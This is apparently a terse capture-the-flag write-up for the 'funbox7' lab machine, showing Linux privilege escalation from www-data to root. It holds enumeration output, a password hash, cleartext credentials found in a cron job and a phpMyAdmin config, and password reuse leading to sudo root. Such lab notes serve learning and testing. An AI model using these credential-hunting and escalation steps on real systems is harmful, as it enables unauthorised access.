3 box enum www-data > privesc > root
www-data@funbox7:/home$ ls -la
total 28
drwxr-xr-x 7 root root 4096 Sep 18 2020 .
drwxr-xr-x 24 root root 4096 Sep 19 2020 ..
drwxr-xr-x 2 goat goat 4096 Feb 16 13:25 goat
drwxr-xr-x 2 harry harry 4096 Jan 28 2021 harry
drwxr-xr-x 2 karla karla 4096 Feb 16 13:23 karla
drwxr-xr-x 2 oracle oracle 4096 Feb 16 13:23 oracle
drwxr-xr-x 2 sally sally 4096 Jan 28 2021 sally
# no files in any user
# nothing in /optPEAS
â•£ Active Ports
â•š https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
â•£ Users with console
goat:x:1003:1003:,,,:/home/goat:/bin/bash
harry:x:1001:1001:,,,:/home/harry:/bin/bash
karla:x:1000:1000:karla:/home/karla:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
root:x:0:0:root:/root:/bin/bash
sally:x:1002:1002:,,,:/home/sally:/bin/bash
â•£ MySQL version
mysql Ver 14.14 Distrib 5.7.31, for Linux (x86_64) using EditLine wrapper
â•£ SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec
â•£ SGID
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at# we can become oracle as we have password
www-data@funbox7:/var/www/html$ su oracle
Password:
oracle@funbox7:/var/www/html$ whoami;id
oracle
uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)pspy
2021/08/13 18:16:01 CMD: UID=0 PID=24777 | /usr/sbin/CRON -f
2021/08/13 18:17:01 CMD: UID=0 PID=24787 | tar -cvzf /root/html.tar.gz /var/www/html/ -ulissy -pgangsta
2021/08/13 18:17:01 CMD: UID=0 PID=24784 | /bin/sh -c tar -cvzf /root/html.tar.gz /var/www/html/ -ulissy -pgangstawww-data@funbox7:/tmp$ cat /etc/phpmyadmin/config-db.php
<?php
$dbuser='phpmyadmin';
$dbpass='tgbzhnujm!';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
www-data@funbox7:/tmp$
http://192.168.105.132/phpmyadmin
# logged in
# nothing in pma__users
# trying password for different users
www-data@funbox7:/tmp$ su karla
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
karla@funbox7:/tmp$ sudo -l
[sudo] password for karla:
Matching Defaults entries for karla on funbox7:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User karla may run the following commands on funbox7:
(ALL : ALL) ALL
karla@funbox7:/tmp$ sudo su
root@funbox7:/tmp# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
funbox7Last updated